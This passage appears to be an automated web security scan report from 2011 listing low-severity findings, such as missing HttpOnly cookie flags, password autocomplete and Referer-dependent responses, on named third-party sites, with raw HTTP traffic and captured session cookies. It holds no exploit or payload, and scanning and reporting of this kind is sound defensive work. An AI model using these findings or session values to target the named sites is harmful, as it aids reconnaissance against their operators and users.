Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cSite1475=0; cNav1475=0; cLang1475=1; ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; server=66%2E111%2E109%2E155; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:42:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
pragma: no-cache
cache-control: private
Content-Length: 1890
Content-Type: text/css
Expires: Mon, 14 Feb 2011 18:41:13 GMT
Cache-control: no-cache
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

.b2iQAListContent{
padding: 5px 5px 5px 5px;
}
.b2iCustomPageContent{
margin: 10px 5px 10px 5px;
}
#navblue td a:link, #navblue td a:visited, #navblue td a:hover{
color: #FFF
}
.navspacercell
...[SNIP]...

11.25. http://www.b2i.us/profiles/inc/dom-drag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/inc/dom-drag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profiles/inc/dom-drag.js HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.b2i.us/profiles/investor/fullpage.asp?f=1&BzID=1475&to=cp&Nav=0&LangID=1&s=0&ID=5606
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cSite1475=0; cNav1475=0; cLang1475=1; ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; server=66%2E111%2E109%2E155; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Content-Length: 4060
Content-Type: application/x-javascript
Last-Modified: Tue, 30 Mar 2010 19:49:56 GMT
Accept-Ranges: none
ETag: "562ba02c42d0ca1:4ce"
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
Date: Mon, 14 Feb 2011 18:42:12 GMT
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

/**************************************************
* dom-drag.js
* 09.25.2001
* www.youngpup.net
* Script featured on Dynamic Drive (http://www.dynamicdrive.com) 12.08.2005
****************
...[SNIP]...

11.26. http://www.b2i.us/profiles/inc/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/inc/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profiles/inc/style.css HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.b2i.us/profiles/investor/fullpage.asp?f=1&BzID=1475&to=cp&Nav=0&LangID=1&s=0&ID=5606
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cSite1475=0; cNav1475=0; cLang1475=1; ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; server=66%2E111%2E109%2E155; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Content-Length: 6766
Content-Type: text/css
Last-Modified: Tue, 01 Jun 2010 18:37:34 GMT
Accept-Ranges: none
ETag: "64f3a480b91cb1:4ce"
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
Date: Mon, 14 Feb 2011 18:42:12 GMT
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

<!--
Body {
   margin: 0px;
}

BODY, TD, TH, td, th {
COLOR: black;
FONT-FAMILY: Verdana,Tahoma,Arial,Helvetica;
FONT-SIZE: 12px;
}

.b2iCalHeadline, .b2iCalItemBody, .Misl, .b2iP
...[SNIP]...

11.27. http://www.b2i.us/profiles/investor/LanapBotDetectHandler.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/investor/LanapBotDetectHandler.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profiles/investor/LanapBotDetectHandler.asp?Command=CreateImage&TextStyle=6&ImageWidth=238&imageHeight=50&CodeLength=5&CodeType=0 HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.b2i.us/profiles/investor/contactus.asp?f=1&BzID=1475&to=cm&Nav=0&LangID=1&s=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; cNav1475=0; cSite1475=0; cLang1475=1; server=66%2E111%2E109%2E155; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:42:40 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
Pragma: no-cache
Content-Length: 22349
Content-Type: image/jpeg
Expires: Mon, 14 Feb 2011 18:41:40 GMT
Cache-control: no-cache, no-store, must-revalidate
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

......JFIF.....`.`.....C....................................................................C.......................................................................2...."..............................
...[SNIP]...

11.28. http://www.b2i.us/profiles/investor/contactus.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/investor/contactus.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profiles/investor/contactus.asp?f=1&BzID=1475&to=cm&Nav=0&LangID=1&s=0 HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.mygovernancewebsite.com/requestinfo.htm
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; server=66%2E111%2E109%2E155; cNav1475=0; cSite1475=0; cLang1475=1; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:42:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
pragma: no-cache
cache-control: private
Content-Length: 12228
Content-Type: text/html
Expires: Mon, 14 Feb 2011 18:41:30 GMT
Set-Cookie: server=66%2E111%2E109%2E155; path=/
Cache-control: no-cache
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>

<title>Request Information</title>

<META name="ROBOTS" content="NOFOLLOW">
</head>
<body bgcolor="#FFFFFF" l
...[SNIP]...

11.29. http://www.b2i.us/profiles/investor/fullpage.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.b2i.us
Path:   /profiles/investor/fullpage.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profiles/investor/fullpage.asp?f=1&BzID=1475&to=cp&Nav=0&LangID=1&s=0&ID=5606 HTTP/1.1
Host: www.b2i.us
Proxy-Connection: keep-alive
Referer: http://www.mygovernancewebsite.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cSite1475=0; cNav1475=0; cLang1475=1; ASPSESSIONIDSARSASDC=KDPBGGGAJKEOKILACBLOCHIH; Coyote-2-426f6d8c=426f6d9b:0

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:42:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOR TAIa OUR NAV"
pragma: no-cache
cache-control: private
Content-Length: 11561
Content-Type: text/html
Expires: Mon, 14 Feb 2011 18:41:12 GMT
Set-Cookie: server=66%2E111%2E109%2E155; path=/
Cache-control: no-cache
Set-Cookie: Coyote-2-426f6d8c=426f6d9b:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<META NAME="keywords" content="Corporate Governance, corporate governance web sites, investor relations web sites, in
...[SNIP]...

11.30. http://www.securitynewsdaily.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.securitynewsdaily.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.securitynewsdaily.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:57:13 GMT
Server: Apache
X-Powered-By: Zend Core/2.5.5 PHP/5.2.11
Set-Cookie: a5e04250348ef9239c1cdf4824f43ad1=hlmo9hnbt56jevkmj0vf1uonb4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 14 Feb 2011 18:57:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

11.31. http://www.webcastir.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webcastir.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.webcastir.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSARSBSCC=LLELFGGAOFEAHPKMENBGOGAB; Coyote-2-426f6d68=426f6d2d:0

Response

HTTP/1.1 404 Not Found
Content-Length: 14027
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 18:42:19 GMT
Set-Cookie: Coyote-2-426f6d68=426f6d2d:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META HTTP-EQUIV=refresh CONTENT=3550; URL=http://www.b2i.us/profiles/investor/fullpage.asp?f=1&BzID=318&to=cp&Nav=0&La
...[SNIP]...

12. Password field with autocomplete enabled  previous  next
There are 3 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


12.1. https://support.palantir.com/pg/login.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.palantir.com
Path:   /pg/login.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /pg/login.do HTTP/1.1
Host: support.palantir.com
Connection: keep-alive
Referer: https://support.palantir.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F3A71652B86046597A441E158CEE25D6

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:52:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4546


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</script>

<form method="post" action="j_security_check" id="loginForm">
   <table cellpadding="0" cellspacing="5" width="100%">
...[SNIP]...
<td align="right"><input type="password" name="j_password" id="j_password" style="width: 170px"/></td>
...[SNIP]...

12.2. https://symaccount.symantec.com/SymAccount/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://symaccount.symantec.com
Path:   /SymAccount/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /SymAccount/index.jsp?returnURL=https%3A%2F%2Fwww-secure.symantec.com%2Fconnect%2Fsymantec_symaccount HTTP/1.1
Host: symaccount.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/connect/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=123259657.1297710221.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|26ACBE3E050135F4-4000010880054D66[CE]; __utma=123259657.27213714.1297710221.1297710221.1297710221.1; __utmc=123259657; __utmv=123259657.anonymous%20user|1=User%20roles=anonymous%20user=1,; __utmb=123259657.4.10.1297710221; s_pers=%20s_nr%3D1297710257466-New%7C1318446257466%3B%20event69%3Devent69%7C1318446257467%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasconnect%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520connect%2525253A%25252520allconnct%2525253A%25252520overview%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%2525252Fuser%2525252Fregister%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 19:04:03 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0001jNJOoXbS6XFi_8-L5Hb1piK:3LT5QVUHCV; Path=/
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Content-Length: 7972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
</p>


        <form name="profile" method="post" action="/SymAccount/processLogin.do;jsessionid=0001jNJOoXbS6XFi_8-L5Hb1piK:3LT5QVUHCV">


           <div style="background-color:#EBEBEB; border:#CCCCCC; solid 1px; padding:8px; margin:0px 15px 10px 15px;">
...[SNIP]...
<td>

                           
                               <input type="password" name="userPassword" maxlength="50" tabindex="2" value="" style="width:197px" class="text">

                           
                                                   </td>
...[SNIP]...

12.3. http://www.hidglobal.com/onlineOrderStatusRegistration.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.hidglobal.com
Path:   /onlineOrderStatusRegistration.php

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /onlineOrderStatusRegistration.php HTTP/1.1
Host: www.hidglobal.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=10140716.1297708154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=kr9b485jm7dv1f9g8un99oala4; __utma=10140716.584761103.1297708154.1297708154.1297708154.1; __utmc=10140716; __utmb=10140716.2.10.1297708154; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26ACBA4A851D330C-6000012840002166[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 18:29:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
</div>

<FORM name='userRegistration' action='/onlineOrderStatusRegistration.php' method='post'>
   <input name='hidOLO' type='hidden' value='true'>
...[SNIP]...
</span> <INPUT style='BACKGROUND-COLOR: #ffffa0' type='password' size='24' value='' name='pw1'> (No spaces)<BR />
...[SNIP]...
</span> <INPUT style='BACKGROUND-COLOR: #ffffa0' type=password size=24 value='' name=pw2> (No spaces)<BR />
...[SNIP]...

13. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftools%2F&title=Security+Tools+%26+Resources&layout=button_count&show_faces=true&width=100&action=like&font=trebuchet+ms&colorscheme=light&height=25 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.securitynewsdaily.com/tools/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwashingtonpost.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.washingtonpost.com%252Fwp-dyn%252Fcontent%252Farticle%252F2011%252F02%252F13%252FAR2011021301463.html%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 14 Feb 2011 18:57:28 GMT
Content-Length: 7736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d597b18c721e8482636349" class="connect_widget button_count" style="font-family: &quot;trebuchet ms&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid connect_widget_button_count_summary" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up"></div></td><td><div class="undo hidden_elem"><label class="undo_button uiCloseButton uiCloseButtonSmall uiCloseButtonSmall" for="u984881_1"><input title="Remove" type="button" id="u984881_1" /></label></div></td><td><div class="summary_text">8 people</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"></div></td><td><div class="connect_widget_button_count_count">7</div></td></tr></tbody></table></td></tr></table><div class="connect_widget_sample_connections clearfix"></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"27b128ef",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:342848,vip:"66.220.147.22",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:20,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"fn45e",lhsh:"fdf48",tracking_domain:"http:\/\/pixel.facebook.com",silent_oops_errors:"1",use_css_import_in_ie:"1",ajaxpipe_enabled:"1",chat_fe_rewrite:"1"};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"JOgNK":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/y_\/r\/txqM0K8lHHk.css"},"s8NLO":{"type":"css","permanent":1,"sr
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fwww.securitynewsdaily.com%2Ftools%2F&title=Security+Tools+%26+Resources&layout=button_count&show_faces=true&width=100&action=like&font=trebuchet+ms&colorscheme=light&height=25 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwashingtonpost.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.washingtonpost.com%252Fwp-dyn%252Fcontent%252Farticle%252F2011%252F02%252F13%252FAR2011021301463.html%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Mon, 14 Feb 2011 18:58:47 GMT
Content-Length: 7695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4d597b6777a809583766800" class="connect_widget button_count" style="font-family: &quot;trebuchet ms&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid connect_widget_button_count_summary" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up"></div></td><td><div class="undo hidden_elem"><label class="undo_button uiCloseButton uiCloseButtonSmall uiCloseButtonSmall" for="u992749_1"><input title="Remove" type="button" id="u992749_1" /></label></div></td><td><div class="summary_text">8 people</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"></div></td><td><div class="connect_widget_button_count_count">7</div></td></tr></tbody></table></td></tr></table><div class="connect_widget_sample_connections clearfix"></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"7282081b",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:342848,vip:"66.220.147.22",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",tlds:["com"],rep_lag:20,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"fn45e",lhsh:"fdf48",tracking_domain:"http:\/\/pixel.facebook.com",silent_oops_errors:"1",use_css_import_in_ie:"1",ajaxpipe_enabled:"1",chat_fe_rewrite:"1"};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"JOgNK":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/y_\/r\/txqM0K8lHHk.css"},"s8NLO":{"type":"css","permanent":1,"sr
...[SNIP]...

14. Cross-domain POST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webcastir.com
Path:   /favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.b2i.us. The form contains the following fields:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

GET /favicon.ico HTTP/1.1
Host: www.webcastir.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSARSBSCC=LLELFGGAOFEAHPKMENBGOGAB; Coyote-2-426f6d68=426f6d2d:0

Response

HTTP/1.1 404 Not Found
Content-Length: 14027
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 14 Feb 2011 18:42:19 GMT
Set-Cookie: Coyote-2-426f6d68=426f6d2d:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META HTTP-EQUIV=refresh CONTENT=3550; URL=http://www.b2i.us/profiles/investor/fullpage.asp?f=1&BzID=318&to=cp&Nav=0&La
...[SNIP]...
<br>
<form name="searchForm" action="http://www.b2i.us/profiles/investor/contentsearch.asp" method="post">
<div align="center">
...[SNIP]...

15. Cross-domain Referer leakage  previous  next
There are 16 instances of this issue:

Issue background

